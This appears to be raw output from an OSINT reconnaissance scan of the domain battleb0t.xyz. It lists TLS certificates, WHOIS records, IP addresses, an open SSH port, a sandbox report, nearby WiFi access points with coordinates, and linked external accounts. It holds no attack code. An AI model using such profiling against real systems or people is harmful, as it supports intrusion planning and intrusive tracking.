9f:9a:47:7a:a3:aa:26:bd:ef:52:90:60:1c:7e:d9:
0d:dc:f1:5b:cb:c0:7c:8b:f6:64:bf:41:76:8c:ba:
34:64:15:cb:49:b9:40:f8:78:ff:c5:eb:99:a1:af:
b3:7a:cb:c9:d0:b9:1b:1a:3d:ef:4c:68:86:22:46:
99:75:81:d3:cf:5c:90:1a:2f:01:4f:59:01:34:82:
5c:f7:3f
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6D:D8:A8:24:70:8B:8F:0C:4D:0C:6C:1A:D9:1A:9A:75:25:E5:1A:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:portainer.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 10:44:01.511 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BA:66:A9:AA:5E:0F:A6:67:BA:ED:61:
B9:4A:97:4F:0B:86:A7:57:50:55:B9:A5:69:1B:DC:7C:
65:C9:5B:E4:5B:02:20:6A:38:79:69:94:85:41:86:C0:
4E:33:F0:44:69:54:C5:A9:40:ED:85:BC:5D:66:70:B8:
31:1F:C8:D3:58:B2:89
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 10:44:01.990 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:D7:1B:E9:32:CF:B7:9A:93:B2:BF:77:
63:D5:5A:7F:F4:A0:6C:77:51:03:FE:F1:5C:A7:51:2C:
16:22:63:24:9A:02:21:00:E1:61:68:D5:A1:EE:9A:2E:
9E:AF:84:50:74:9E:B6:EB:55:A1:CA:4D:CE:91:07:8D:
31:2D:F6:05:41:96:C7:BF
Signature Algorithm: sha256WithRSAEncryption
a4:99:cc:17:c2:9a:8e:12:57:4b:5f:f3:9f:2c:de:1e:67:a2:
15:f4:c2:a6:9a:37:ce:60:60:9f:eb:7b:4e:d1:f5:56:0a:77:
87:4d:62:42:b9:af:17:7b:da:58:7a:6f:13:64:15:09:4e:90:
23:78:51:46:b5:fd:d4:cc:83:1e:ee:91:6d:c6:56:93:07:ae:
30:b8:d8:e6:ea:e5:86:c8:36:d3:3f:ac:2f:8b:df:14:86:08:
eb:08:79:b4:e2:b8:85:a4:15:71:51:85:18:65:cb:a8:ed:92:
eb:f7:89:15:96:1f:f7:d9:1c:15:d2:aa:fd:8f:7f:2f:0c:fa:
5e:72:7c:3c:89:e8:0c:5a:70:50:ef:1f:1d:93:9d:0a:a2:65:
6b:bc:f9:07:8e:3b:f7:ed:d5:4c:37:b1:48:2b:7b:c8:b0:02:
1d:3a:a2:c7:65:6c:2d:5a:92:f1:fd:51:00:e1:4b:ac:78:1f:
32:ae:7e:03:f4:0b:1f:cf:e7:b2:0f:1e:53:51:4d:d4:41:52:
82:77:57:35:05:af:16:cf:55:87:95:55:14:cd:4c:80:d7:09:
00:5e:46:ac:87:47:23:25:66:0a:6d:de:61:87:1a:7b:22:b8:
5a:2a:93:d2:ac:83:ea:40:df:11:e8:22:85:ab:f2:84:66:88:
cc:de:a7:8a
| battleb0t.xyz |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | London, England, W1B, United States, North America |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Flipboard (Category: tech)
https://flipboard.com/@ayshoo | ayshoo |
| 2023-05-12 03:00:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.14): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:17:05 | Username | No | Account Finder | 17 | 0 | 1 | 0 | None | battleb0t | battleb0t.xyz |
| 2023-05-12 02:54:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://kurt-defreitas.github.io/img/placeholder.sv', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bd8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bd8_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bd8_ConnHashTable<3032>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bd8_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3032"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_bd8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_bd8_IE_EarlyTabStart_0xbb8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kurt-defreitas.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "en-US.5" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.5]- [targetUID: 00000000-00003032]\n "~DFA2731819B86592CA.TMP" has type "data"- Location: [%TEMP%\\~DFA2731819B86592CA.TMP]- [targetUID: 00000000-00003032]\n "~DFCCC928221FE4ACD8.TMP" has type "data"- Location: [%TEMP%\\~DFCCC928221FE4ACD8.TMP]- [targetUID: 00000000-00003032]\n "~DF3682FED50B1F86F1.TMP" has type "data"- Location: [%TEMP%\\~DF3682FED50B1F86F1.TMP]- [targetUID: 00000000-00003032]\n "~DF9E4BE3D4F707C6B3.TMP" has type "data"- Location: [%TEMP%\\~DF9E4BE3D4F707C6B3.TMP]- [targetUID: 00000000-00003032]\n "RecoveryStore._C7A4F1AE-D920-11E7-B48D-080027D44A30_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._4536F183-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4536F185-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_4D880574-D3A7-11ED-A4A6-080027748A4E_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "2UHLR4HR.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2UHLR4HR.txt]- [targetUID: 00000000-00003032]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "PNG image data 16 x 16 4-bit colormap non-interlaced"- [targetUID: N/A]\n "TPFMNZ18.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\TPFMNZ18.txt]- [targetUID: 00000000-00003032]\n "HPYEEPFO.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HPYEEPFO.txt]- [targetUID: 00000000-00003032]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://kurt-defreitas.github.io/img/placeholder.sv"\n Pattern match: "https://kurt-defreitas.github.io"\n Pattern match: "MUID3901E857A0CA662738CBFA56A18667BBmicrosoft.com/1025411295705631056689247978600330978218*SRCHDAF=NOFORMmicrosoft.com/1024194638604831125287247978600330978218*SRCHUIDV=2&GUID=A9F735962E2A42C3AFD3CAEB5B5F826B&dmnchg=1microsoft.com/1024194638604831125287247"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025333882060831061302120807300431025076*"\n Pattern match: "www.msn.com/"\n Pattern match: "MUIDB3901E857A0CA662738CBFA56A18667BBieonline.microsoft.com/9216244540108831103547120572925431025076*"\n Heuristic match: "kurt-defreitas.github.io"\n Pattern match: "kurt-defreitas.github.io/img/placeholder.sv"\n Heuristic match: "urt-defreitas.github.io"\n Heuristic match: "img/placeholder.sv"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "5.1.0.0" found in string "Microsoft.Windows.Shell.rundll32,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\rundll32.exe"\n Potential IP "5.1.0.0" found in string "Microsoft.Windows.InetCore.ieframe,processorArchitecture="amd64",type="win32",version="5.1.0.0"C:\\Windows\\system32\\IEFRAME.dll"\n Potential IP "5.1.0.0" found in string "version="5.1.0.0""'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'642d77c048c27e508a04f41c', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 3, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'185.199.109.153'], u'sha256': u'f8888b6fa1427ba3882de44e533fed25e64f7f76af4d032bc1a8856df7bb161b', u'sha512': u'c1ecf0ef0a8cc6465fd767beba9a9de0182633eadebdcd46681d32fcecf6bc9a2d40b17032b512656c173c7bf9bc7fba09331efcb1478464d13e4cd84da89283', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://kurt-defreitas.github.io/img/placeholder.sv', u'submission_id': u'642d77c148c27e508a04f41d', u'created_at': u'2023-04-05T13:29:37+00:00', u'filename': None}], u'analysis_start_time': u'2023-04-05T13:42:20+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 1, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'c58c917dcf7fa15b312b69ef43d33c3b', u'network_mode': u'default', u'processes': [], u'sha1': u'b112d67b92ef42cae143614cd7ccb3351a327eb8', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'kurt-defreitas.github.io'], u'extracted_files': [], u'type_short': []}] | 185.199.109.153 |
| 2023-05-12 02:54:20 | BGP AS Membership | No | Censys | 0 | 0 | 4 | 0 | None | 14618 | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AitchBee13 (Net ID: 00:02:2D:68:90:A6) | 37.7642, -122.3993 |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | github.io | www.battleb0t.xyz |
| 2023-05-12 02:44:28 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a5:65:fa:d8:79:b7:aa:9f:cd:61:b9:6d:61:bb:
e3:07:27:16:d3:e1:46:58:db:ea:35:f8:26:d8:c8:
09:7e:b6:39:79:12:45:7f:4a:96:c2:65:47:bc:37:
b3:76:46:83:08:24:7b:32:63:f5:07:b6:17:66:20:
18:e4:18:8c:6e:16:7f:bc:81:ec:10:38:cc:20:6d:
2c:d6:29:65:3d:24:15:7a:78:2a:d0:43:3c:46:03:
10:b3:27:47:c6:2c:d9:37:1a:f8:11:aa:82:ad:00:
76:a7:88:0c:2b:f1:1a:b2:9a:95:76:c4:a9:4b:c3:
62:f9:12:87:35:9a:50:60:71:89:06:0b:f5:83:3f:
b3:37:8b:3d:cb:f9:c2:99:ee:99:d3:c8:08:07:e1:
c6:20:fc:1e:cb:95:74:f5:c1:74:33:8b:1b:39:2e:
63:89:98:62:bd:9a:c6:13:b2:b5:95:ec:cb:ee:ce:
27:e7:da:24:f1:8e:b6:e6:ab:e2:7a:20:63:e1:26:
ab:e8:05:03:30:6e:ae:59:d4:02:26:10:36:ee:3d:
2a:f4:c0:78:59:fa:77:cd:2a:88:bd:16:94:1a:e1:
c4:ca:d8:5b:b7:12:2e:db:10:0e:ec:94:77:40:49:
b3:6f:75:18:22:d3:cb:58:3c:44:d0:05:e2:db:a8:
00:c9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8a:d2:67:fd:ed:b1:23:72:f0:a2:4c:97:ee:c5:7e:e1:b0:
84:de:17:e3:7f:b0:fd:4c:e4:f5:d9:c1:87:4a:b8:32:d6:97:
13:2d:ab:c3:d8:0c:ce:60:02:7a:3d:d5:8b:4f:9b:89:37:1e:
07:e8:65:4f:13:db:bc:f2:3f:ba:ea:3a:b7:97:d8:a0:c0:4a:
65:8c:35:35:fd:69:77:08:6c:3c:bf:e2:a6:4a:02:ca:fc:ed:
e5:52:89:bc:c1:b6:61:98:79:3c:a3:31:8c:d6:1d:49:4c:6e:
4f:51:4b:80:2f:a3:0a:eb:fd:a0:1d:23:01:9e:b7:13:91:2e:
ea:39:a6:6a:a5:6e:65:a0:60:47:cf:fa:44:01:e4:af:f2:74:
c6:c0:9c:28:45:d7:eb:58:39:c7:39:24:41:f2:f3:e3:a3:aa:
8b:59:5c:05:a1:91:0e:a2:f0:b0:ab:cb:39:e8:59:97:1b:9f:
8d:d8:c2:47:ab:c2:d9:46:03:7a:5d:eb:fd:3e:65:0d:f9:fe:
dc:1b:a2:95:80:34:f0:64:f6:d6:5a:43:e4:2b:5f:53:8b:84:
65:53:97:2f:8f:bb:f4:1d:f8:10:82:18:da:d2:33:31:94:ea:
59:b0:de:49:31:a7:28:65:0c:5e:e7:fb:cf:58:f0:de:70:9b:
5c:67:53:d1
|
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_6.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:55:18 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 46.101.229.70:22 | 46.101.229.70 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:DD:2B:69) | 39.0469, -77.4903 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pornhub Users (Category: XXXPORNXXX)
https://www.pornhub.com/users/login | login |
| 2023-05-12 02:45:16 | Physical Location | No | ipapi.co | 0 | 0 | 4 | 0 | None | Toronto, Ontario, ON, Canada, CA | 2606:4700:3030::ac43:a8fc |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | nocwap (Net ID: 00:04:5A:CC:3F:27) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:44:27 | IP Address | No | DNS Resolver | 51 | 0 | 2 | 0 | None | 172.67.168.252 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | MIP (Net ID: 00:01:29:EE:B3:03) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | DD-WRT (Net ID: 00:14:BF:30:AA:54) | 32.8608, -79.9746 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 20:35:09 (Net ID: 00:02:2D:05:BE:2A) | 37.780462,-122.390564 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RyanLG (Net ID: 00:01:36:4F:9A:F0) | 37.7813933,-122.3918002 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.69 | 34.74.170.74 |
| 2023-05-12 03:00:10 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpanel.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:08:59 | Affiliate - IP Address | No | DNS Look-aside | 3 | 0 | 2 | 0 | None | 87.248.157.93 | 87.248.157.102 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.251): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:45:58 | Physical Coordinates | No | AbstractAPI | 93 | 0 | 3 | 0 | None | 50.1188, 8.6843 | 64.226.81.43 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
| battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 220-cp.keyubu.net ESMTP Exim 4.95 #2 Wed, 10 May 2023 17:29:11 +0300
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
| 87.248.157.102 |
| 2023-05-12 03:32:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.7:443 | 188.114.97.0/24 |
| 2023-05-12 03:08:52 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.148.97.132 | 34.148.97.127 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FizzyPop (Net ID: 00:02:2D:0F:C8:E1) | 34.0544, -118.244 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 07:55:46 (Net ID: 00:02:2D:05:BB:87) | 37.780462,-122.390564 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
